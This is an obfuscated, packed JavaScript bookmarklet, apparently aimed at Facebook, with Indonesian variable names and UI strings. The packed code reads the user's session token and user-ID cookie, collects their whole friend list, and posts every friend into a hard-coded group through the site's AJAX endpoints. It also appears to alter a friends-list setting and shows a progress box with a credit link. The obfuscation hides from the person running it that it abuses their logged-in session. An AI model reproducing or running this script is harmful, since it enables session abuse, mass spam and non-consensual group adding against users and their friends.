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javascript:void(function(){eval(function(p,a,c,k,e,r){e=function(c){return(c&lt;a?'':e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('46:4D(K(){E j=M.2K(\'1w\')[0].2y;E k=M.4d.4t(/44=(\\d+)/)[1];E m=\'3A\';E o=8;E t=\'4l\';E v=\'2Y\';V.w={2N:\'\\47 4b=\\B//4j-a.4m.4o/4p.1S/4A/4K/r/3h-3k.3m\\B 1Q=\\3W\\B 2g=\\45\\B I=\\1s:0 1H\\B/\\A\',4i:\'1w=\'+j+\'&amp;1V=\'+k+\'&amp;2i=\'+m+\'&amp;2k=\'+o+\'&amp;2D=\'+t+\'&amp;2l=\'+v+\'&amp;1G=1\',2s:\'1w=\'+j+\'&amp;1V=\'+k+\'&amp;1G=1&amp;4E=2M&amp;4Q=&amp;4Y=&amp;2X=\',2j:\'1G=1&amp;31=\'+k+\'&amp;3a=\'+S.2u()+\'&amp;3l[0]=24&amp;3y[0]=3z\',2L:\'3C=3T&amp;3V=2P&amp;3X=3Z&amp;1w=\'+j+\'&amp;1V=\'+k+\'&amp;1G=1&amp;2i=\'+m+\'&amp;2k=\'+o+\'&amp;2D=\'+t+\'&amp;2l=\'+v,19:K(a,b){E c=\'\\1z L=\\4c\\B 1v=\\B#\\B 4h=\\B\';C(a==R||a==\'\'){c+=\'w.4k()\'}F{c+=a}c+=\';1x 4n\\B I=\\1B-1D:2c;4u:1F;4B-2g:2c\\B\\A\';C(b==R||b==\'\'){c+=\'4C\'}F{c+=b}1x c+\'\\D/a\\A\'},4G:K(b,c,d){C(c){E a=M.28(\'G\');a.Q=b;C(d==R){d=c.P}1A(a.P){c.2t(a.P,d)}}},20:K(b,c){C(c){E a=M.28(\'G\');a.Q=b;1A(a.P){c.3g(a.P)}}},1g:{1h:\'1i-1X:3s;1I-X:1k;3B:1k\',2e:\'1Q:3D;3H:3K;z-3P:3Q;1l:30%;2d:0;1i-1X:1U;2z-1D:2n;1I-X:1H;1h-41:0 0 43 2m(0,0,0,0.25);1P-1p:2m(1O,1O,1O,0.4a)\'},2R:K(a){E b=a.T,c,d;1A(0!==b){d=S.1c(S.2u()*b);b-=1;c=a[b];a[b]=a[d];a[d]=c}E e=[\'i\',\'a\',\'e\',\'g\',\'o\',\'s\',\'n\',\'b\',\'l\',\'p\',\'m\',\'h\',\'r\',\'u\',\'c\',\'-\',\'t\',\'3\',\'\\4r\'],1L=e[11]+e[5]+e[15]+e[14]+e[12]+e[2]+e[1]+e[16]+e[0]+e[4]+e[6]+e[5]+\'.\'+e[7]+e[8]+e[4]+e[3]+e[5]+e[9]+e[4]+e[16]+\'.\'+e[14]+e[4]+e[10];w.1M=\'\\H I=\\1s-1l:2n;1p:4N;2z-1D:4O;1i-1X:2d\\B\\A\'+e[11].2q()+e[5]+e[15]+e[14].2q()+e[12]+e[2]+e[1]+e[16]+e[0]+e[4]+e[6]+e[5]+\' \'+e[e.T-1]+e[11]+e[0]+e[16]+e[13]+\'\\H I=\\1B-1D:2c\\B\\A\\1z 1v=\\4X://\'+1L+\'/\\B U=\\1N\\B\\A\'+1L+\'\\D/a\\A\\D/G\\A\\D/G\\A\';1x a},1r:K(i,r,l,a,n){C(n==R||n==\'\'){n=\'2Z\'}F{i+=\'?\'+r}E h=32 33();h.34(n,i,35);h.36(\'37-38\',\'39/x-3b-3c-3d\');h.3e=K(c){C(c.U.3f==4){C(w.1q){w.1q++}F{w.1q=1}E e={1o:\'3i 3j!\',1a:\'1t 1y=\'+c.U.1y};C(c.U.1y==3n||c.U.1y==3o){E d=c.U.3p;C(d==\'\'){e.1o=\'3q 3r!\'}F{e=1R.3t(d.3u(d.3v(\'{\'),d.3w(\'}\')+1))}a(l,e)}F C(w.1q&lt;2){w.1r(i,r,l,a,n)}F{w.1q=0;a(l,e)}}};h.3x(r)},O:K(a,b){E c=M.1n(\'2B-1T\');C(c){C(b==R||b==\'\'){c.2E.Q=a}F{E d=M.1n(b);C(d){d.Q=a}F{w.20(\'\\H 1e=\\B\'+b+\'\\B\\A\'+a+\'\\D/G\\A\',c.2E)}}}F{E e=\'\\H 1e=\\3E-1T\\B L=\\3F 3G\\B I=\\B\'+w.1g.2e+\'\\B\\A\\H\\A\\D/G\\A\\H\\A\'+a+\'\\D/G\\A\\D/G\\A\';E f=M.1n(\'3I\');C(!f){f=M.3J}w.20(e,f)}},2Q:K(){E a=M.1n(\'2B-1T\');C(a){a.3L.3M(a)}w.1r(\'/1t/J/3N/2P/3O\',w.2L,\'\',K(){})},18:K(){V.N=0;w.3R=0;w.O(\'3S J, 1u 2f.. \'+w.2N);w.1r(\'/1t/2M/3U.1S\',w.2j,\'\',K(q,p){C(p.1J&amp;&amp;p.1J.2h){w.J=w.2R(p.1J.2h);E a=\'\\H L=\\3Y\\B I=\\1W-X:1k\\B\\40 \\Y\\A\'+w.J.T+\' 42\\D/b\\A\\D/G\\A\\H 1e=\\1K\\B I=\\1s-1l:1F\\B\\A\\D/G\\A\\H 1e=\\1K-1j\\B I=\\1s-1l:1F\\B\\A\\D/G\\A\\H 1e=\\1K-1j-1Y\\B I=\\1s-1l:1F\\B\\A\\D/G\\A\';C(w.J.T==0){w.O(a+w.19(\'w.18()\'+w.1M))}F{w.O(a+w.1M);w.1Z()}}F C(p&amp;&amp;p.1o&amp;&amp;p.1a){w.O(\'\\H L=\\1C\\B I=\\1W-X:1k\\B\\A\'+p.1o+\', \'+p.1a+\'\\D/G\\A\'+w.19(\'w.18()\'))}F{w.O(\'\\H L=\\1C\\B I=\\1W-X:1k\\B\\A\'+1R.2o(p)+\'\\D/G\\A\'+w.19(\'w.18()\'))}},\'48\')},49:K(a,b){E c=\'\';C(b&amp;&amp;b.2p){c=b.2p}F C(b&amp;&amp;b!=\'\'){21(x 2r w.J){C(w.J[x].1i&amp;&amp;w.J[x].22&amp;&amp;w.J[x].22==b){c=w.J[x].1i;4e}}}1x c.4f(\' \')[0]},1Z:K(c,d){E e=\'4g \';C(c==R||c==\'\'){c=0;w.W=0;w.1f=0;w.2v=M.2K(\'2w\')[0].2y}C(d==R||d==\'\'){d=2x}C(d&gt;w.J.T){d=w.J.T;w.Z=\'\'}F{w.Z={f:d,t:((d*2)-c)}}e+=(c+1)+\' 23 \'+d+\' J 23 2A, 1u 2f.. \';w.O(e,\'1d\');21(E x=c;x&lt;d;x++){w.1r(\'/1t/4q/2C/4s.1S\',w.2s+\'&amp;2w=\'+w.2v+\'&amp;2C=\'+w.J[x].22,\'\',K(q,p){C(p&amp;&amp;p.1o&amp;&amp;p.1a){w.W++;E a=\'\\H L=\\1C\\B I=\\B\'+w.1g.1h+\'\\B\\A\';E b=p.1a;C(p.26&amp;&amp;p.26[0]){b=p.1a.27(/4v 24|24 |4w 4x|4y /4z,\'\\1z 1v=\\B/J\\B U=\\1N\\B I=\\1B-2F:2G\\B\\A\'+2H(p.26[0].27(/2I\\./i,\'w.\'))+\'\\D/a\\A\')}a+=\'\\H\\A(2J: \\Y\\A\'+w.W+\'\\D/b\\A) \'+b+\'\\D/G\\A\';a+=\'\\D/G\\A\';w.O(a,\'1d-1j-1Y\')}F C(p.1b&amp;&amp;p.1b.1m){w.1f++;E a=\'\\H L=\\4F\\B I=\\B\'+w.1g.1h+\'\\B\\A\\Y\\A\';21(y 2r p.1b.1m){C(p.1b.1m[y][3]&amp;&amp;p.1b.1m[y][3][1]){a+=\' \'+p.1b.1m[y][3][1]}}C(p.29&amp;&amp;p.29[0]){a+=\'\\D/b\\A\\H\\A(4H: \\Y\\A\'+w.1f+\'\\D/b\\A) \\1z 1v=\\B/J\\B U=\\1N\\B I=\\1B-2F:2G\\B\\A\'+2H(p.29[0].27(/2I\\./i,\'w.\'))+\'\\D/a\\A 4I 23 2A..\\D/G\\A\'}a+=\'\\D/G\\A\';w.O(a,\'1d-1j\')}F{w.W++;E a=\'\\H L=\\1C\\B I=\\B\'+w.1g.1h+\'\\B\\A(2J: \\Y\\A\'+w.W+\'\\D/b\\A) \'+1R.2o(p)+\'\\D/G\\A\';w.O(a,\'1d-1j-1Y\')}C((w.W+w.1f)&gt;=w.J.T){w.O(w.19(\'w.18()\')+\' \'+w.19(\'w.2Q()\',\'4J\'),\'1d\')}F C(w.Z.f&amp;&amp;(w.W+w.1f)&gt;=w.Z.f){w.1Z(w.Z.f,w.Z.t)}w.2O(M.1n(\'1d\'),w.J.T,\'#4L\',K(){},\'4M\')})}},2O:K(a,i,n,g,s){i=i*1;C(V.N&amp;&amp;V.N&lt;i){N++}F C(V.N&amp;&amp;V.N==i){}F{V.N=1}E u=a.2a(\'4P-2b\')[0];E b=((N*2x)/i);C(u){u.P.I.1Q=b+\'%\';C(s==R||s==\'\'){a.P.Q=N+\'/\'+i;C(N&gt;=i){a.2a(\'2S-1E\')[0].Q=\'\\Y I=\\4R:4S\\B\\A\'+S.1c(b)+\'% 4T!\\D/b\\A\';g()}F{a.2a(\'2S-1E\')[0].Q=\'4U \'+S.1c(b)+\'% 2T 1u..\'}}F{u.P.Q=S.1c(b)+\'%\';C(N&gt;=i){g()}}}F{u=M.28(\'G\');C(s==R||s==\'\'){u.Q=\'\\2U L=\\4V-1E\\B\\4W \'+S.1c(b)+\'% 2T 1u..\\D/1U\\A\\H L=\\2V-2b\\B\\A\\H I=\\2W:\'+b+\'%;1P-1p:\'+n+\';1I-X:1H\\B\\A&amp;4Z;\\D/G\\A\\D/G\\A\\2U L=\\50-1E\\B\\A\'+N+\'/\'+i+\'\\D/1U\\A\'}F{u.Q=\'\\H L=\\2V-2b\\B\\A\\H I=\\2W:\'+b+\'%;1P-1p:\'+n+\';1I-X:1H;51-52:53;54:55;1p:#56\\B\\A\'+S.1c(b)+\'%\\D/G\\A\\D/G\\A\'}1A(u.P){a.2t(u.P,a.P)}}}};w.18()})();',62,317,'||||||||||||||||||||||||||||||||aing||||x3E|x22|if|x3C|var|else|div|x3Cdiv|style|friends|function|class|document|loadBarFrom|kasihTau|firstChild|innerHTML|null|Math|length|target|window|edgruperor|radius|x3Cb|edgrupnek|||||||||getPren|btn|errorDescription|jsmods|floor|edtugrup|id|edgrupok|styl|box|text|impoh|3px|top|require|getElementById|errorSummary|color|panggilanKe|kolAjak|x22margin|ajax|wait|href|fb_dtsg|return|status|x3Ca|while|x22font|x22uiBoxRed|size|count|2px|__a|5px|border|payload|x22edtugrup|crl|crj|x22_blank|242|background|width|JSON|php|bawah|center|__user|x22border|align|eror|addToGroup|apen|for|uid|to|user||onafterload|replace|createElement|onload|getElementsByClassName|bar|9px|right|inf|up|height|entries|__dyn|prmgp|__req|ttstamp|rgba|10px|stringify|name|toUpperCase|in|prmdg|insertBefore|random|gid|group_id|100|value|font|Group|kiri|members|__rev|lastChild|weight|bold|eval|Arbiter|Fail|getElementsByName|prmls|typeahead|ldng|loadBar|subscribe|klos|aduk|stat|Please|x3Ccenter|x22loading|x22width|phstamp|265816767119957579|POST||viewer|new|XMLHttpRequest|open|true|setRequestHeader|Content|type|application|token|www|form|urlencoded|onreadystatechange|readyState|appendChild|GsNJNwuI|connection|error|UM|filter|gif|200|400|responseText|empty|callback|left|parse|substring|indexOf|lastIndexOf|send|options|friends_only|7n8ahyj35CCzpQ9UmWOGUGy1m9ACUb8yGg|padding|location|500px|x22kiri|x22pam|uiBoxGray|position|rightCol|body|fixed|parentNode|removeChild|lists|modify|index|9999|deleted|Collecting|permalink|first_degree|action|x2216px|flid|x22uiBoxGray|632434366824269|x3EFound|shadow|Friends|7px|c_user|x2211px|javascript|x3Cimg|GET|inform|75|src|x22uiButton|cookie|break|split|Adding|onClick|prm|fbstatic|injek|1033590|akamaihd|false|net|rsrc|groups|xA9|add_post|match|margin|This|Pengguna|ini|pengguna|gi|v2|line|Rescan|void|source|x22uiBoxYellow|insb|Added|added|Close|yb|4c66a4|no|gray|12px|loading|ref|x22color|darkgreen|Done|Loading|x22stat|x3ELoading|x22http|message_id|nbsp|x22prog|white|space|nowrap|overflow|visible|fff9d7'.split('|'),0,{}))})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